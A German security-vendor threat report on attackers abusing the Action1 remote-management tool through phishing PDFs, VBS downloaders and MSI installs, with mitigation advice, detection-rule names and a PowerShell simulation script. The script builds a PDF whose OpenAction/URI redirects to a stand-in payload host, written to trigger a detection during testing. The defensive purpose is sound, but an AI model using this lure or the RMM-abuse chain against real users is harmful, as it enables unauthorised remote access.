Missbrauch von RMM-Tools nimmt in aktiven Bedrohungskampagnen weiter zu
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure missbrauchen Remote-Management- und Monitoring-Tools (RMM), insbesondere Action1, um einen dauerhaften Zugriff in kompromittierten Umgebungen einzurichten. Der Angriff beginnt mit einer Phishing-E-Mail, die eine bösartige PDF-Datei enthält, die die Opfer zu einer VBS-Datei umleitet. Das Skript lädt dann ein MSI-Paket herunter und installiert es, das den legitimen Action1-Agenten enthält, wodurch unbefugter Remote-Zugriff ermöglicht wird.
Untersuchung
Die Untersuchung deckte eine bösartige PDF-Datei auf, die OpenAction- und URI-Schlüsselwörter nutzt, um einen Download von einer Vercel-gehosteten URL zu initiieren. Die Analyse des abgerufenen MSI-Pakets zeigte, dass legale Dateien der Action1 Corporation durch die eigene Cloud-Infrastruktur des Anbieters missbraucht wurden. Der installierte Agent enthält eine spezifische CustomerID und kommuniziert mit einer legitimen Action1-Domain.
Minderung
Organisationen sollten die E-Mail-Filterung so konfigurieren, dass verdächtige PDF-Strukturen identifiziert werden, die OpenAction- oder URI-Schlüsselwörter enthalten. Sicherheitsteams sollten die Installation unautorisierter RMM-Tools und die Erstellung des A1Agent-Dienstes überwachen. Das Blockieren von Verbindungen zu unerwarteter RMM-Cloud-Infrastruktur und das Erkennen ungewöhnlicher oder unautorisierter CustomerIDs kann das Risiko von Missbrauch durch Fernzugriff weiter verringern.
Reaktion
Wird bösartige RMM-Aktivität entdeckt, sollte der betroffene Host isoliert werden, um zusätzliche Remote-Befehlsausführung zu verhindern. Die ursprüngliche Phishing-E-Mail sollte untersucht und eine forensische Analyse der zugehörigen VBS- und MSI-Dateien durchgeführt werden. Potenziell kompromittierte Anmeldeinformationen sollten widerrufen und Action1-Agenten-Konfigurationen auf Anzeichen unautorisierten Fernzugriffs oder Persistenz überprüft werden.
Angriffsfluss
Wir aktualisieren diesen Teil noch.
Erkennungen
LOLBAS WScript / CScript (über Prozess-Erstellung)
Alternative Fernzugriffs-/Verwaltungssoftware (über Prozess-Erstellung)
Mögliche Dateninfiltration/-exfiltration/C2 über Drittanbieterdienste/-tools (über Proxy)
Mögliche Dateninfiltration/-exfiltration/C2 über Drittanbieterdienste/-tools (über DNS)
Mögliche Kommando- und Kontrollaktivität durch Fernzugriffs-Software-Domänenkommunikationsversuch (über DNS)
IOCs (HashSha256), um zu erkennen: Weitere RMM-Tools in freier Wildbahn
Remote-Verbindung zu Action1-Servern [Windows-Netzwerkverbindung]
PDF OpenAction und URI-Umleitung zu bösartigem VBS [Windows-Datei-Ereignis]
Simulation Ausführung
-
Angriffserzählung & Befehle: Der Gegner simuliert eine Phishing-Kampagne. Das Ziel ist es, eine Datei namens
Transaktionsbeleg .pdfan ein Opfer zu liefern. Das PDF ist so gestaltet, dass, sobald der Benutzer es öffnet, das/OpenActionKommando löst eine/URIWeiterleitung aus. Diese Weiterleitung soll den Benutzer zu einer Website führen, die ein bösartiges VBScript bereitstellt. Um die spezifische bereitgestellte Erkennungsregel auszulösen, erstellen wir eine Datei mit dem genau erforderlichen Namen und den internen Zeichenfolgen. -
Regressionstest-Skript:
# Simulationsskript: Auslösung der PDF OpenAction-Erkennung $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf" # Erstellung des "bösartigen" PDF-Inhalts, um die Erkennungsschlüsselwörter zu erfüllen $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # Schreiben der Datei auf die Festplatte, um die 'file_event'-Erkennung auszulösen $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "Simulationsdatei erstellt unter: $targetFile" Write-Host "Überprüfen Sie Ihr SIEM auf den Erkennungsalarm." -
Bereinigungskommandos:
# Bereinigung: Entfernen der simulierten bösartigen Datei $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "Bereinigung abgeschlossen: $targetFile entfernt." } else { Write-Host "Bereinigung: Datei nicht gefunden." }